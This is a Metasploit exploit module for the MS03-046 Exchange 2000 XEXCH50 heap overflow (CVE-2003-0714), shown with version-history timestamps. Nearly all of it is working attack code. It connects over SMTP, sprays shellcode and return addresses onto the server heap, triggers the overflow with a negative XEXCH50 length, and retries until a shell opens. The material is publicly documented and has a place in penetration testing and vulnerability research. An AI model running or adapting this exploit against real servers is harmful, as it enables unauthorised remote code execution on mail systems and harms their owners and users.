2009-11-24 07:11:12 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2009-11-24 07:11:12 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-07 19:19:55 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = GoodRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'MS03-046 Exchange 2000 XEXCH50 Heap Overflow',
|
|
|
|
'Description' => %q{
|
|
|
|
This is an exploit for the Exchange 2000 heap overflow. Due
|
|
|
|
to the nature of the vulnerability, this exploit is not very
|
|
|
|
reliable. This module has been tested against Exchange 2000
|
|
|
|
SP0 and SP3 running a Windows 2000 system patched to SP4. It
|
|
|
|
normally takes between one and 100 connection attempts to
|
|
|
|
successfully obtain a shell. This exploit is *very* unreliable.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'hdm', # original module
|
|
|
|
'patrick', # msf3 port :)
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2003-0714' ],
|
|
|
|
[ 'BID', '8838' ],
|
|
|
|
[ 'OSVDB', '2674' ],
|
|
|
|
[ 'MSB', 'MS03-046' ],
|
|
|
|
[ 'EDB', '113' ],
|
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'seh',
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Privileged' => true,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 1024,
|
|
|
|
'BadChars' => "\x00\x0a\x0d\x20:=+\x22",
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Exchange 2000', { 'Ret' => 0x0c900c90, 'BuffLen' => 3000, 'Offset1' => 11000, 'Offset2' => 512 } ],
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'DisclosureDate' => 'Oct 15 2003'))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(25),
|
|
|
|
OptString.new('MAILFROM', [ true, 'The FROM address of the e-mail', 'random@example.com']),
|
|
|
|
OptString.new('MAILTO', [ true, 'The TO address of the e-mail', 'administrator']),
|
|
|
|
OptInt.new('ATTEMPTS', [ true, 'The number of exploit attempts before halting', 100]),
|
|
|
|
])
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
connect
|
|
|
|
banner = sock.get_once || ''
|
|
|
|
|
|
|
|
if (banner !~ /Microsoft/)
|
|
|
|
print_status("Target does not appear to be an Exchange server.")
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
sock.put("EHLO #{Rex::Text.rand_text_alpha(1)}\r\n")
|
|
|
|
res = sock.get_once || ''
|
|
|
|
if (res !~ /XEXCH50/)
|
|
|
|
print_status("Target does not appear to be an Exchange server.")
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")
|
|
|
|
res = sock.get_once || ''
|
|
|
|
|
|
|
|
if (res =~ /Sender OK/)
|
|
|
|
sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")
|
|
|
|
res = sock.get_once || ''
|
|
|
|
if (res =~ /250/)
|
|
|
|
sock.put("XEXCH50 2 2\r\n")
|
|
|
|
res = sock.get_once || ''
|
|
|
|
if (res !~ /Send binary data/)
|
|
|
|
print_error("Target has been patched!")
|
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
else
|
|
|
|
return Exploit::CheckCode::Appears
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
|
|
|
|
def smtp_setup(count)
|
|
|
|
print_status("Exploit attempt ##{count}")
|
|
|
|
|
|
|
|
connect
|
|
|
|
select(nil,nil,nil,1)
|
|
|
|
banner = sock.get_once || ''
|
|
|
|
print_status("Connected to SMTP server: #{banner.to_s}")
|
|
|
|
|
|
|
|
if (banner !~ /Microsoft/)
|
|
|
|
print_status("Target does not appear to be running Exchange.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
select(nil,nil,nil,5)
|
|
|
|
sock.put("EHLO X\r\n")
|
|
|
|
select(nil,nil,nil,7)
|
|
|
|
res = sock.get_once || ''
|
|
|
|
|
|
|
|
if (res !~ /XEXCH50/)
|
|
|
|
print_status("Target is not running Exchange.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")
|
|
|
|
select(nil,nil,nil,3)
|
|
|
|
|
|
|
|
sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")
|
|
|
|
select(nil,nil,nil,3)
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
bufflen = target['BuffLen']
|
|
|
|
print_status("Trying to exploit #{target.name} with address 0x%.8x..." % target['Ret'])
|
|
|
|
count = 1 # broke
|
|
|
|
|
|
|
|
begin
|
|
|
|
if (count > datastore['ATTEMPTS'])
|
|
|
|
print_error("Exploit failed after #{datastore['ATTEMPTS']}. Set ATTEMPTS to a higher value if desired.")
|
|
|
|
return # Stop after a specified number of attempts.
|
|
|
|
end
|
|
|
|
|
|
|
|
if (session_created?)
|
|
|
|
return # Stop the attack. Non-session payloads will continue regardless up to ATTEMPTS.
|
|
|
|
end
|
|
|
|
|
|
|
|
while(true)
|
|
|
|
if (smtp_setup(count))
|
|
|
|
print_status("Connection 1: ")
|
|
|
|
end
|
|
|
|
|
|
|
|
sock.put("XEXCH50 2 2\r\n")
|
|
|
|
select(nil,nil,nil,3)
|
2014-06-28 21:10:49 +00:00
|
|
|
res = sock.get_once
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("#{res}")
|
|
|
|
if (res !~ /Send binary data/)
|
|
|
|
print_status("Target is not vulnerable.")
|
|
|
|
return # commented out for the moment
|
|
|
|
end
|
|
|
|
|
|
|
|
sock.put("XX")
|
|
|
|
|
|
|
|
print_status("ALLOC")
|
|
|
|
|
|
|
|
size = 1024 * 1024 * 32
|
|
|
|
|
|
|
|
sock.put("XEXCH50 #{size} 2\r\n")
|
|
|
|
select(nil,nil,nil,3)
|
|
|
|
|
|
|
|
sploit = (([target['Ret']].pack('V')) * 256 * 1024 + payload.encoded + ("X" * 1024)) * 4 + "BEEF"
|
|
|
|
|
|
|
|
print_status("Uploading shellcode to remote heap.")
|
|
|
|
|
|
|
|
if (sock.put(sploit))
|
|
|
|
print_status("\tOK.")
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Connection 2: ")
|
|
|
|
smtp_setup(count) # Connection 2
|
|
|
|
|
|
|
|
sock.put("XEXCH50 -1 2\r\n") # Allocate negative value
|
|
|
|
select(nil,nil,nil,2)
|
|
|
|
res = sock.get_once || ''
|
|
|
|
|
|
|
|
if (!res)
|
|
|
|
print_error("Error - no response")
|
|
|
|
end
|
2009-11-24 07:11:12 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("OK")
|
2009-11-24 07:11:12 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
bufflen += target['Offset2']
|
2009-11-24 07:11:12 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if (bufflen > target['Offset1'])
|
|
|
|
bufflen = target['BuffLen']
|
|
|
|
end
|
2009-11-24 07:11:12 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
heapover = [target['Ret']].pack('V') * bufflen
|
|
|
|
print_status("Overwriting heap with payload jump (#{bufflen})")
|
|
|
|
sock.put(heapover)
|
2009-11-24 07:11:12 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Starting reconnect sequences...")
|
2009-11-24 07:11:12 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
10.times do |x|
|
|
|
|
print_status("Connect #{x}")
|
|
|
|
connect
|
|
|
|
sock.put("HELO X\r\n")
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
end
|
2009-11-24 07:11:12 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
rescue
|
|
|
|
print_status("Unable to connect or Exchange has crashed... Retrying.")
|
|
|
|
count += 1
|
|
|
|
retry
|
|
|
|
end
|
2009-11-24 07:11:12 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
disconnect
|
|
|
|
end
|
2009-11-24 07:11:12 +00:00
|
|
|
end
|